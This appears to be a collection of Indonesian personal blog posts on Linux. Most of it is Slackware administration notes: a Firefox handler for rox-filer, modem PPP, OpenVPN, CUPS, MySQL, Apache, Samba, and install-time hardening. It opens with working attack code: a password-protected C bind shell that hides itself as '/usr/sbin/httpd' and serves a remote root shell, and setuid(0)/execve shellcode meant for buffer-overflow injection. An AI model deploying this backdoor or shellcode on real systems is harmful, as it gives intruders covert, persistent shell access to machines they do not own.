Bindshell with password

Ngerti sendiri lah ini untuk apa. =))

/*
 * (original sourcenya lupa)
 * edited by zam
 * - Hotline -
 */


#define PORT 1234
#define PASS "******"
//#define PROMPT "hehe!\n"
#define SIP "[zam]-OK!\n"
#include <stdio.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
struct sockaddr_in serv_addr; 
struct sockaddr_in client_addr;
char login[50];

int main (int argc, char *argv[])
{
 int i;
 for(i=0;i<argc;i++) {
  memset(argv[i],'\x0',strlen(argv[i]));
 };
 strcpy(argv[0],"/usr/sbin/httpd");
 soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
 if (soc_des == -1) 
  exit(-1); 
 bzero((char *) &serv_addr, sizeof(serv_addr));
 serv_addr.sin_family = AF_INET; 
 serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
 serv_addr.sin_port = htons(PORT);
 soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
 if (soc_rc != 0) 
  exit(-1);
 if (fork() != 0) 
  exit(0); 
 setpgrp();  
 signal(SIGHUP, SIG_IGN); 
 if (fork() != 0) 
  exit(0); 
 soc_rc = listen(soc_des, 5);
 if (soc_rc != 0) 
  exit(0); 
 while (1) { 
  soc_len = sizeof(client_addr);
  soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
  if (soc_cli < 0) 
   exit(0); 
  cli_pid = getpid(); 
  server_pid = fork(); 
  if (server_pid != 0) { 
   //write(soc_cli, PROMPT, sizeof(PROMPT));
   read(soc_cli, login, sizeof(login));
   if(strcmp(login, PASS, sizeof(PASS)) < 0)
    exit(0);
   write(soc_cli, SIP, sizeof(SIP));
   dup2(soc_cli,0); 
   dup2(soc_cli,1); 
   dup2(soc_cli,2);
   execl("/bin/sh","sh",(char *)0); 
   close(soc_cli); 
   exit(0); 
  }
  close(soc_cli);
 }
}

Setuid(0) && execve("/bin//sh",0,0) shellcode

Ini didapat dari hasi baca saja, inti dari kode ini yaitu eksekusi shellcode. Apabila shellcode ini masuk ke dalam buffer program yang berjalan kemudian tereksekusi maka akan menghasilkan sebuah shell di dalam system yang mana kita bisa menggunakan shell tersebut untuk mengeksekusi perintah-perintah di dalam sistem di mana program dijalankan.

// 35 bytes

char shellcode[]=
"\x31\xc0"                      //xor    %eax,%eax
"\x31\xdb"                      //xor    %ebx,%ebx
"\x31\xc9"                      //xor    %ecx,%ecx
"\x31\xd2"                      //xor    %edx,%edx
"\xb0\x17"                      //mov    $0x17,%al
"\x31\xdb"                      //xor    %ebx,%ebx
"\xcd\x80"                      //int    $0x80
"\xb0\x0b"                      //mov    $0xb,%al
"\x53"                          //push   %ebx
"\x68\x2f\x2f\x73\x68"          //push   $0x68732f2f
"\x68\x2f\x62\x69\x6e"          //push   $0x6e69622f
"\x89\xe3"                      //mov    %esp,%ebx
"\x31\xc9"                      //xor    %ecx,%ecx
"\x31\xd2"                      //xor    %edx,%edx
"\xcd\x80";                     //int    $0x80

int main(void)
{
 (*(void(*)()) shellcode)();
}

Combining "rox-filer" with "firefox"

Ketika anda benar-benar ingin menggunakan window manager yang minimalis seperti yang "box-box" itu, mungkin anda akan menemukan permasalahan yang sama, yaitu tidak dapat melakukan "Open download folder" secara langsung melalui klik kanan download managernya firefox. Berikut ini merupakan cara yang saya pakai (sesuai dengan penalaran saya sendiri) untuk mengatasi hal di atas :

1. create file "~/.mozilla/firefox/rox.sh"

#!/bin/sh
# rox launcher for firefox
# by : zam a.k.a. s3m
if [ -z "$1" ] 
then
 exit 65
else
 /usr/bin/rox -U $1
fi

2. chmod file "~/.mozilla/firefox/rox.sh"

zam@darkstar$ chmod +x ~/.mozilla/firefox/rox.sh

3. edit file "~/.mozilla/firefox/xxxxxxxx.default/mimeTypes.rdf"
Bagian terpenting yang di edit adalah :

  
                   NC:prettyName="rox"
                   NC:path="~/.mozilla/firefox/rox.sh" />

Berikut Keseluruhan isi file :

<?xml version="1.0"?>
<RDF:RDF xmlns:NC="http://home.netscape.com/NC-rdf#"
         xmlns:RDF="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
  <RDF:Description RDF:about="urn:scheme:handler:mailto"
                   NC:alwaysAsk="true">
    <NC:possibleApplication RDF:resource="urn:handler:web:http://compose.mail.yahoo.com/?To=%s"/>
    <NC:possibleApplication RDF:resource="urn:handler:web:https://mail.google.com/mail/?extsrc=mailto&url=%s"/>
    <NC:possibleApplication RDF:resource="urn:handler:local:/usr/bin/thunderbird"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:rtsp"
                   NC:value="rtsp">
    <NC:handlerProp RDF:resource="urn:scheme:handler:rtsp"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:mimetype:handler:application/x-bzip2"
                   NC:alwaysAsk="true"
                   NC:saveToDisk="true">
    <NC:externalApplication RDF:resource="urn:mimetype:externalApplication:application/x-bzip2"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:handler:mms"
                   NC:alwaysAsk="true">
    <NC:possibleApplication RDF:resource="urn:handler:local:/usr/bin/gnome-mplayer"/>
    <NC:possibleApplication RDF:resource="urn:handler:local:/usr/bin/mplayer"/>
    <NC:externalApplication RDF:resource="urn:scheme:externalApplication:mms"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:file"
                   NC:value="file">
    <NC:handlerProp RDF:resource="urn:scheme:handler:file"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:handler:web:https://mail.google.com/mail/?extsrc=mailto&url=%s"
                   NC:prettyName="GMail"
                   NC:uriTemplate="https://mail.google.com/mail/?extsrc=mailto&url=%s" />
  <RDF:Description RDF:about="urn:handler:local:~/.mozilla/firefox/rox.sh"
                   NC:prettyName="rox"
                   NC:path="~/.mozilla/firefox/rox.sh" />
  <RDF:Description RDF:about="urn:scheme:webcal"
                   NC:value="webcal">
    <NC:handlerProp RDF:resource="urn:scheme:handler:webcal"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:handler:local:/usr/bin/thunderbird"
                   NC:prettyName="thunderbird"
                   NC:path="/usr/bin/thunderbird" />
  <RDF:Description RDF:about="urn:handler:web:https://www.mibbit.com/?url=%s"
                   NC:prettyName="Mibbit"
                   NC:uriTemplate="https://www.mibbit.com/?url=%s" />
  <RDF:Description RDF:about="urn:mimetype:text/x-sh"
                   NC:value="text/x-sh"
                   NC:editable="true"
                   NC:description="shell script">
    <NC:handlerProp RDF:resource="urn:mimetype:handler:text/x-sh"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:mimetype:handler:text/x-csrc"
                   NC:alwaysAsk="true"
                   NC:saveToDisk="true">
    <NC:externalApplication RDF:resource="urn:mimetype:externalApplication:text/x-csrc"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:handler:webcal"
                   NC:alwaysAsk="true">
    <NC:possibleApplication RDF:resource="urn:handler:web:http://30boxes.com/external/widget?refer=ff&url=%s"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:handler:local:/usr/bin/mplayer"
                   NC:prettyName="mplayer"
                   NC:path="/usr/bin/mplayer" />
  <RDF:Description RDF:about="urn:scheme:handler:irc"
                   NC:alwaysAsk="true">
    <NC:possibleApplication RDF:resource="urn:handler:web:https://www.mibbit.com/?url=%s"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:handler:web:http://compose.mail.yahoo.com/?To=%s"
                   NC:prettyName="Yahoo! Mail"
                   NC:uriTemplate="http://compose.mail.yahoo.com/?To=%s" />
  <RDF:Description RDF:about="urn:scheme:handler:ircs"
                   NC:alwaysAsk="true">
    <NC:possibleApplication RDF:resource="urn:handler:web:https://www.mibbit.com/?url=%s"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:externalApplication:rtsp"
                   NC:prettyName="mplayer"
                   NC:path="/usr/bin/mplayer" />
  <RDF:Description RDF:about="urn:mimetype:application/zip"
                   NC:value="application/zip"
                   NC:editable="true"
                   NC:description="Zip archive">
    <NC:handlerProp RDF:resource="urn:mimetype:handler:application/zip"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:handler:local:/usr/bin/gnome-mplayer"
                   NC:prettyName="gnome-mplayer"
                   NC:path="/usr/bin/gnome-mplayer" />
  <RDF:Description RDF:about="urn:mimetype:handler:audio/mpeg3"
                   NC:alwaysAsk="true"
                   NC:saveToDisk="true">
    <NC:externalApplication RDF:resource="urn:mimetype:externalApplication:audio/mpeg3"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:mimetype:audio/mpeg3"
                   NC:value="audio/mpeg3"
                   NC:editable="true"
                   NC:description="">
    <NC:handlerProp RDF:resource="urn:mimetype:handler:audio/mpeg3"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:mimetype:handler:application/x-java-archive"
                   NC:alwaysAsk="true"
                   NC:saveToDisk="true">
    <NC:externalApplication RDF:resource="urn:mimetype:externalApplication:application/x-java-archive"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:mimetype:handler:application/x-gzip"
                   NC:alwaysAsk="true"
                   NC:saveToDisk="true">
    <NC:externalApplication RDF:resource="urn:mimetype:externalApplication:application/x-gzip"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:handler:rtsp"
                   NC:alwaysAsk="true">
    <NC:possibleApplication RDF:resource="urn:handler:local:/usr/bin/mplayer"/>
    <NC:possibleApplication RDF:resource="urn:handler:local:/usr/bin/xine"/>
    <NC:possibleApplication RDF:resource="urn:handler:local:/usr/bin/gxine"/>
    <NC:externalApplication RDF:resource="urn:scheme:externalApplication:rtsp"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:handler:local:/usr/bin/xine"
                   NC:prettyName="xine"
                   NC:path="/usr/bin/xine" />
  <RDF:Description RDF:about="urn:mimetype:handler:text/x-sh"
                   NC:alwaysAsk="true"
                   NC:saveToDisk="true">
    <NC:externalApplication RDF:resource="urn:mimetype:externalApplication:text/x-sh"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:schemes">
    <NC:Protocol-Schemes RDF:resource="urn:schemes:root"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:mms"
                   NC:value="mms">
    <NC:handlerProp RDF:resource="urn:scheme:handler:mms"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:externalApplication:file"
                   NC:prettyName="rox"
                   NC:path="~/.mozilla/firefox/rox.sh" />
  <RDF:Description RDF:about="urn:mimetypes">
    <NC:MIME-types RDF:resource="urn:mimetypes:root"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:mimetype:application/x-gzip"
                   NC:value="application/x-gzip"
                   NC:editable="true"
                   NC:description="Gzip archive">
    <NC:handlerProp RDF:resource="urn:mimetype:handler:application/x-gzip"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:handler:local:/usr/bin/gxine"
                   NC:prettyName="gxine"
                   NC:path="/usr/bin/gxine" />
  <RDF:Description RDF:about="urn:mimetype:handler:application/zip"
                   NC:alwaysAsk="true"
                   NC:saveToDisk="true">
    <NC:externalApplication RDF:resource="urn:mimetype:externalApplication:application/zip"/>
  </RDF:Description>
  <RDF:Seq RDF:about="urn:schemes:root">
    <RDF:li RDF:resource="urn:scheme:mailto"/>
    <RDF:li RDF:resource="urn:scheme:irc"/>
    <RDF:li RDF:resource="urn:scheme:ircs"/>
    <RDF:li RDF:resource="urn:scheme:webcal"/>
    <RDF:li RDF:resource="urn:scheme:file"/>
    <RDF:li RDF:resource="urn:scheme:rtsp"/>
    <RDF:li RDF:resource="urn:scheme:mms"/>
  </RDF:Seq>
  <RDF:Seq RDF:about="urn:mimetypes:root">
    <RDF:li RDF:resource="urn:mimetype:application/x-gzip"/>
    <RDF:li RDF:resource="urn:mimetype:audio/mpeg3"/>
    <RDF:li RDF:resource="urn:mimetype:application/zip"/>
    <RDF:li RDF:resource="urn:mimetype:application/x-java-archive"/>
    <RDF:li RDF:resource="urn:mimetype:text/x-csrc"/>
    <RDF:li RDF:resource="urn:mimetype:application/x-bzip2"/>
    <RDF:li RDF:resource="urn:mimetype:text/x-sh"/>
  </RDF:Seq>
  <RDF:Description RDF:about="urn:scheme:irc"
                   NC:value="irc">
    <NC:handlerProp RDF:resource="urn:scheme:handler:irc"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:handler:file"
                   NC:alwaysAsk="false">
    <NC:externalApplication RDF:resource="urn:scheme:externalApplication:file"/>
    <NC:possibleApplication RDF:resource="urn:handler:local:~/.mozilla/firefox/rox.sh"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:mailto"
                   NC:value="mailto">
    <NC:handlerProp RDF:resource="urn:scheme:handler:mailto"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:ircs"
                   NC:value="ircs">
    <NC:handlerProp RDF:resource="urn:scheme:handler:ircs"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:mimetype:application/x-bzip2"
                   NC:value="application/x-bzip2"
                   NC:editable="true"
                   NC:description="Bzip archive">
    <NC:handlerProp RDF:resource="urn:mimetype:handler:application/x-bzip2"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:mimetype:application/x-java-archive"
                   NC:value="application/x-java-archive"
                   NC:editable="true"
                   NC:description="Java Archive">
    <NC:handlerProp RDF:resource="urn:mimetype:handler:application/x-java-archive"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:handler:web:http://30boxes.com/external/widget?refer=ff&url=%s"
                   NC:prettyName="30 Boxes"
                   NC:uriTemplate="http://30boxes.com/external/widget?refer=ff&url=%s" />
  <RDF:Description RDF:about="urn:root"
                   NC:en-US_defaultHandlersVersion="3" />
  <RDF:Description RDF:about="urn:scheme:externalApplication:mms"
                   NC:prettyName="gnome-mplayer"
                   NC:path="/usr/bin/gnome-mplayer" />
  <RDF:Description RDF:about="urn:mimetype:text/x-csrc"
                   NC:value="text/x-csrc"
                   NC:editable="true"
                   NC:description="C source code">
    <NC:handlerProp RDF:resource="urn:mimetype:handler:text/x-csrc"/>
  </RDF:Description>
</RDF:RDF>

4. restart firefox and download some file, then try "Open" or "Open containing folder" menu ;).

Zte ac2726 + smart + slackware 13.0

cara ini merupakan penyederhanaan dari cara sebelumnya http://4s3m.blogspot.com/2010/01/zte-ac2726-slackware-130.html

1. download and install latest "usb_modeswitch" package, and modem will be detected like this:

2. create file "/etc/ppp/peers/smart"

hide-password
noauth
asyncmap 0
modem
proxyarp
noipx
persist
idle 1000000
connect "/usr/sbin/chat -v -f /etc/ppp/peers/smartconnect"
debug
ttyUSB0
921600
defaultroute
noipdefault
user "smart"
remotename smart
ipparam smart
crtscts
lock
usepeerdns

3. create file "/etc/ppp/peers/smartconnect"

ABORT BUSY
ABORT 'NO CARRIER'
ABORT VOICE
ABORT 'NO DIALTONE'
ABORT 'NO DIAL TONE'
ABORT 'NO ANSWER'
ABORT DELAYED
'' "AT"
'OK' "ATQ0V1E0"
'OK' "ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0"
OK-AT-OK "ATDT#777"
CONNECT \d\c

4. run pppd to connect

root@darkstar# pppd call smart

Free with OpenVPN

OpenVPN package has been installed.

1. generate the certificate authority

root@glowstar# cd /usr/share/doc/openvpn/examples/easy-rsa/2.0
root@glowstar# source ./vars
root@glowstar# ./clean-all
root@glowstar# ./build-ca

2. create the server and client keys

root@glowstar# ./build-key-server server
root@glowstar# ./build-key client

3. generate the diffie-hellman parameters

root@glowstar# ./build-dh

4. create /etc/openvpn/server.conf

local 74.x.x.x
port 443
proto udp
dev tun
ca /usr/share/doc/openvpn/examples/easy-rsa/2.0/keys/ca.crt
cert /usr/share/doc/openvpn/examples/easy-rsa/2.0/keys/server.crt
key /usr/share/doc/openvpn/examples/easy-rsa/2.0/keys/server.key 
dh /usr/share/doc/openvpn/examples/easy-rsa/2.0/keys/dh1024.pem
server 10.8.0.0 255.255.255.0
ifconfig-pool-persist ipp.txt
push "route 10.8.0.0 255.255.255.0"
push "redirect-gateway"
push "dhcp-option DNS 208.68.222.222"
keepalive 10 120
comp-lzo
persist-key
persist-tun
status openvpn-status.log
verb 3

5. start OpenVPN server

root@glowstar# openvpn /etc/openvpn/server.conf

6. copy this file to the client computer:

/usr/share/doc/openvpn/examples/easy-rsa/2.0/keys/ca.crt
/usr/share/doc/openvpn/examples/easy-rsa/2.0/keys/client.crt
/usr/share/doc/openvpn/examples/easy-rsa/2.0/keys/client.key 

7. create client.conf

client
dev tun
proto udp
remote 74.x.x.x 443
resolv-retry infinite
nobind
persist-key
persist-tun
ca ca.crt
cert client.crt
key client.key
comp-lzo
verb 3

8. load module "tun" and connect to server

root@darkstar# /sbin/modprobe tun
root@darkstar# openvpn client.conf

9. if connected it will be like this:



10. try ping the server



11. now, may you can create ssh connection? ;)

Printing service S13

1. set executable rc.cups

root@dakrstar# chmod +x /etc/rc.d/rc.cups

2. run print server

root@dakrstar# /etc/rc.d/rc.cups start

3. open administration page

# http://localhost:631/

Setting mysqld S13

1. create db

root@darkstar# mysql_install_db --user=mysql

2. set executable rc.mysqld

root@dakrstar# chmod +x /etc/rc.d/rc.mysqld

3. run mysql server

root@darkstar# /etc/rc.d/rc.mysqld start

4. run secure instalation

root@darkstar# mysql_secure_installation

Setting httpd S13

1. edit /etc/httpd/httpd.conf

###############################
# simple httpd.conf
###############################
ServerRoot "/usr"
Listen 80
LoadModule authn_file_module lib/httpd/modules/mod_authn_file.so
LoadModule authn_dbm_module lib/httpd/modules/mod_authn_dbm.so
LoadModule authn_anon_module lib/httpd/modules/mod_authn_anon.so
LoadModule authn_dbd_module lib/httpd/modules/mod_authn_dbd.so
LoadModule authn_default_module lib/httpd/modules/mod_authn_default.so
LoadModule authn_alias_module lib/httpd/modules/mod_authn_alias.so
LoadModule authz_host_module lib/httpd/modules/mod_authz_host.so
LoadModule authz_groupfile_module lib/httpd/modules/mod_authz_groupfile.so
LoadModule authz_user_module lib/httpd/modules/mod_authz_user.so
LoadModule authz_dbm_module lib/httpd/modules/mod_authz_dbm.so
LoadModule authz_owner_module lib/httpd/modules/mod_authz_owner.so
LoadModule authnz_ldap_module lib/httpd/modules/mod_authnz_ldap.so
LoadModule authz_default_module lib/httpd/modules/mod_authz_default.so
LoadModule auth_basic_module lib/httpd/modules/mod_auth_basic.so
LoadModule auth_digest_module lib/httpd/modules/mod_auth_digest.so
LoadModule file_cache_module lib/httpd/modules/mod_file_cache.so
LoadModule cache_module lib/httpd/modules/mod_cache.so
LoadModule disk_cache_module lib/httpd/modules/mod_disk_cache.so
LoadModule mem_cache_module lib/httpd/modules/mod_mem_cache.so
LoadModule dbd_module lib/httpd/modules/mod_dbd.so
LoadModule dumpio_module lib/httpd/modules/mod_dumpio.so
LoadModule reqtimeout_module lib/httpd/modules/mod_reqtimeout.so
LoadModule ext_filter_module lib/httpd/modules/mod_ext_filter.so
LoadModule include_module lib/httpd/modules/mod_include.so
LoadModule filter_module lib/httpd/modules/mod_filter.so
LoadModule substitute_module lib/httpd/modules/mod_substitute.so
LoadModule deflate_module lib/httpd/modules/mod_deflate.so
LoadModule ldap_module lib/httpd/modules/mod_ldap.so
LoadModule log_config_module lib/httpd/modules/mod_log_config.so
LoadModule log_forensic_module lib/httpd/modules/mod_log_forensic.so
LoadModule logio_module lib/httpd/modules/mod_logio.so
LoadModule env_module lib/httpd/modules/mod_env.so
LoadModule mime_magic_module lib/httpd/modules/mod_mime_magic.so
LoadModule cern_meta_module lib/httpd/modules/mod_cern_meta.so
LoadModule expires_module lib/httpd/modules/mod_expires.so
LoadModule headers_module lib/httpd/modules/mod_headers.so
LoadModule ident_module lib/httpd/modules/mod_ident.so
LoadModule usertrack_module lib/httpd/modules/mod_usertrack.so
LoadModule unique_id_module lib/httpd/modules/mod_unique_id.so
LoadModule setenvif_module lib/httpd/modules/mod_setenvif.so
LoadModule version_module lib/httpd/modules/mod_version.so
LoadModule proxy_module lib/httpd/modules/mod_proxy.so
LoadModule proxy_connect_module lib/httpd/modules/mod_proxy_connect.so
LoadModule proxy_ftp_module lib/httpd/modules/mod_proxy_ftp.so
LoadModule proxy_http_module lib/httpd/modules/mod_proxy_http.so
LoadModule proxy_scgi_module lib/httpd/modules/mod_proxy_scgi.so
LoadModule proxy_ajp_module lib/httpd/modules/mod_proxy_ajp.so
LoadModule proxy_balancer_module lib/httpd/modules/mod_proxy_balancer.so
#LoadModule ssl_module lib/httpd/modules/mod_ssl.so
LoadModule mime_module lib/httpd/modules/mod_mime.so
LoadModule dav_module lib/httpd/modules/mod_dav.so
LoadModule status_module lib/httpd/modules/mod_status.so
LoadModule autoindex_module lib/httpd/modules/mod_autoindex.so
LoadModule asis_module lib/httpd/modules/mod_asis.so
LoadModule info_module lib/httpd/modules/mod_info.so
LoadModule cgi_module lib/httpd/modules/mod_cgi.so
LoadModule dav_fs_module lib/httpd/modules/mod_dav_fs.so
LoadModule vhost_alias_module lib/httpd/modules/mod_vhost_alias.so
LoadModule negotiation_module lib/httpd/modules/mod_negotiation.so
LoadModule dir_module lib/httpd/modules/mod_dir.so
LoadModule imagemap_module lib/httpd/modules/mod_imagemap.so
LoadModule actions_module lib/httpd/modules/mod_actions.so
LoadModule userdir_module lib/httpd/modules/mod_userdir.so
LoadModule alias_module lib/httpd/modules/mod_alias.so
LoadModule rewrite_module lib/httpd/modules/mod_rewrite.so

<IfModule !mpm_netware_module>
<IfModule !mpm_winnt_module>
User nobody 
Group nogroup

</IfModule>
</IfModule>
ServerAdmin you@example.com
ServerName localhost
DocumentRoot "/home/zam/web/htdocs"
<Directory />
Options FollowSymLinks
AllowOverride None
Order deny,allow
Deny from all
</Directory>
<Directory "/home/zam/web/htdocs">
Options Indexes FollowSymLinks ExecCGI Includes
AllowOverride All
Order allow,deny
Allow from all
</Directory>

<IfModule dir_module>
DirectoryIndex index.html index.html.var index.php index.php3 index.php4
</IfModule>
<FilesMatch "^\.ht">
Order allow,deny
Deny from all
Satisfy All
</FilesMatch>

ErrorLog "/var/log/httpd/error_log"
LogLevel warn

<IfModule log_config_module>
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %b" common

<IfModule logio_module>
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %I %O" combinedio
</IfModule>
CustomLog "/var/log/httpd/access_log" common
</IfModule>

<IfModule alias_module>
ScriptAlias /cgi-bin/ "/srv/httpd/cgi-bin/"
</IfModule>

<IfModule cgid_module>
</IfModule>
<Directory "/srv/httpd/cgi-bin">
AllowOverride None
Options None
Order allow,deny
Allow from all
</Directory>
DefaultType text/plain

<IfModule mime_module>
TypesConfig /etc/httpd/mime.types
AddType application/x-compress .Z
AddType application/x-gzip .gz .tgz
AddHandler cgi-script .cgi .pl
AddType text/html .shtml
AddOutputFilter INCLUDES .shtml
</IfModule>
Include /etc/httpd/extra/httpd-multilang-errordoc.conf
Include /etc/httpd/extra/httpd-autoindex.conf
Include /etc/httpd/extra/httpd-default.conf
<IfModule ssl_module>
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
</IfModule>
Include /etc/httpd/mod_php.conf
###############################

2. set executable file rc.httpd

root@darkstar# chmod +x /etc/rc.d/rc.httpd

3. run httpd server

root@darkstar# /etc/rc.d/rc.httpd start

Setting samba S13

Berikut ini merupakan cara yang saya lakukan untuk melakukan file sharing pada linux slackware saya :

1. create file /etc/samba/smb.conf

##################
# smb.conf Created by zam
##################
[global]
workgroup = H3LL0L4M3RZ
server string = Hack Me
security = user

[zam]
comment = sambaku
path = /home/zam/smb
public = yes 
writable = yes
user = zam
##################

2. create directory /home/zam/smb

zam@darkstar# mkdir /home/zam/smb

3. set executable rc.samba

root@darkstar# chmod +x /etc/rc.d/rc.samba

4. create password for samba user

root@darkstar# smbpasswd -a zam

5. run samba server

root@darkstar# /etc/rc.d/rc.samba start

Mounting remote file system

Mencoba mengakses file sharing dari linux, simple dan tak terlalu pusing panjang lebar :

1.create mount point directory

root@darkstar # mkdir /mnt/smb

2.mount smb share

root@darkstar # mount -t cifs -o username=<your username in smb server>,password=<password> //<smb server>/<share name> /mnt/smb

3.if it success, then do what you want... :)

root@darkstar # cd /mnt/smb

My S13 step installation + system hardenning

Berikut ini merupakan langkah-langkah yang saya jalankan ketika melakukan installasi linux slackware saya. Step dengan bahasa inggris lebih enak kayaknya :

1.install default system (no KDE)
2.upgrade kernel to 2.6.33.2

root@darkstar # cd /usr/src
root@darkstar # rm linux
root@darkstar # tar vxjf linux-2.6.33.2.tar.bz2
root@darkstar # ln -s linux-2.6.33.2 linux
root@darkstar # cd linux
root@darkstar # make
root@darkstar # make modules_install
root@darkstar # make install
root@darkstar # reboot

3.configuring sound system

root@darkstar # alsaconf
root@darkstar # alsamixer
root@darkstar # alsactl store

4.configuring X

root@darkstar # xorgsetup

5.add new user

root@darkstar # adduser

6.change run level (from 3 to 4)

root@darkstar # vim /etc/inittab

7.comment all line in /etc/inetd.conf
8.edit file /etc/X11/xdm/Xservers

:0 local /usr/bin/X -nolisten tcp :0

9.create file /etc/rc.d/rc.firewall (chmod it as executable)

#!/bin/bash
iptables -P INPUT DROP
iptables -P FORWARD DROP
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -s 127.0.0.1 -d 127.0.0.1 -i lo -j ACCEPT

10.chmod important files

chmod 750 /bin/mt-st
chmod 600 /etc/cron*
chmod 600 /etc/ftpusers
chmod 600 /etc/hosts.allow
chmod 600 /etc/hosts.deny
chmod 600 /etc/inetd.conf
chmod 600 /etc/inittab
chmod 600 /etc/lilo.conf
chmod 600 /etc/login.defs
chmod 600 /etc/securetty
chmod 440 /etc/sudoers
chmod 600 /etc/syslog.conf
chmod 750 /sbin/badblocks
chmod 750 /sbin/debugfs
chmod 750 /sbin/depmod
chmod 750 /sbin/dumpe2fs
chmod 750 /sbin/explodepkg
chmod 750 /sbin/fdisk
chmod 750 /sbin/fsck
chmod 750 /sbin/fsck.ext2
chmod 750 /sbin/fsck.minix
chmod 750 /sbin/halt
chmod 750 /sbin/hwclock
chmod 750 /sbin/ifconfig
chmod 750 /sbin/init
chmod 750 /sbin/insmod
chmod 750 /sbin/installpkg
chmod 750 /sbin/isapnp
chmod 750 /sbin/killall5
chmod 750 /sbin/lilo
chmod 750 /sbin/makepkg
chmod 750 /sbin/mke2fs
chmod 750 /sbin/mkfs
chmod 750 /sbin/mkfs.minix
chmod 750 /sbin/mkdosfs
chmod 750 /sbin/mkswap
chmod 750 /sbin/modinfo
chmod 750 /sbin/pkgtool
chmod 750 /sbin/pnpdump
chmod 750 /sbin/removepkg
chmod 750 /sbin/rpc.portmap
chmod 750 /sbin/quotaon
chmod 750 /sbin/rdev
chmod 750 /sbin/runlevel
chmod 750 /sbin/setserial
chmod 750 /sbin/swapon
chmod 750 /sbin/tune2fs
chmod 750 /sbin/upgradepkg
chmod 750 /sbin/uugetty
chmod 750 /usr/bin/eject
chmod 4750 /usr/bin/gpasswd
chmod 750 /usr/bin/lpq
chmod 750 /usr/bin/lprm
chmod 4750 /usr/bin/lpr
chmod 750 /usr/bin/minicom
chmod 700 /usr/bin/nohup
chmod 700 /usr/bin/script
chmod 750 /usr/sbin/atd
chmod 750 /usr/sbin/atrun
chmod 750 /usr/sbin/crond
chmod 750 /usr/sbin/ctrlaltdel
chmod 750 /usr/sbin/dhcpd
chmod 750 /usr/sbin/dhcrelay
chmod 750 /usr/sbin/edquota
chmod 750 /usr/sbin/groupadd
chmod 750 /usr/sbin/groupdel
chmod 750 /usr/sbin/groupmod
chmod 750 /usr/sbin/grpck
chmod 750 /usr/sbin/grpconv
chmod 750 /usr/sbin/grpunconv
chmod 750 /usr/sbin/hdparm
chmod 750 /usr/sbin/imapd
chmod 750 /usr/sbin/in.comsat
chmod 755 /usr/sbin/in.fingerd
chmod 755 /usr/sbin/in.identd
chmod 750 /usr/sbin/in.talkd
chmod 000 /usr/sbin/in.rexecd
chmod 000 /usr/sbin/in.rlogind
chmod 000 /usr/sbin/in.rshd
chmod 750 /usr/sbin/in.telnetd
chmod 000 /usr/sbin/in.tftpd
chmod 750 /usr/sbin/in.timed
chmod 750 /usr/sbin/inetd
chmod 750 /usr/sbin/ipop3d
chmod 750 /usr/sbin/klogd
chmod 2750 /usr/sbin/lpc
chmod 550 /usr/sbin/makemap
chmod 750 /usr/sbin/mouseconfig
chmod 750 /usr/sbin/named
chmod 750 /usr/sbin/newusers
chmod 750 /usr/sbin/nmbd
chmod 750 /usr/sbin/ntpdate
chmod 750 /usr/sbin/ntpq
chmod 750 /usr/sbin/ntptime
chmod 750 /usr/sbin/ntptrace
chmod 750 /usr/sbin/pppd
chmod 750 /usr/sbin/pwck
chmod 750 /usr/sbin/pwconv
chmod 750 /usr/sbin/pwunconv
chmod 550 /usr/sbin/quotastats
chmod 750 /usr/sbin/rpc.bootparamd
chmod 750 /usr/sbin/rpc.mountd
chmod 750 /usr/sbin/rpc.nfsd
chmod 750 /usr/sbin/rpc.rusersd
chmod 750 /usr/sbin/rpc.rwalld
chmod 750 /usr/sbin/rpc.yppasswdd
chmod 750 /usr/sbin/rpc.ypxfrd
chmod 750 /usr/sbin/rpcinfo
chmod 750 /usr/sbin/showmount
chmod 750 /usr/sbin/smbd
chmod 750 /usr/sbin/syslogd
chmod 750 /usr/sbin/tcpd
chmod 750 /usr/sbin/tcpdchk
chmod 750 /usr/sbin/tcpdmatch
chmod 750 /usr/sbin/tcpdump
chmod 750 /usr/sbin/timeconfig
chmod 750 /usr/sbin/useradd
chmod 750 /usr/sbin/userdel
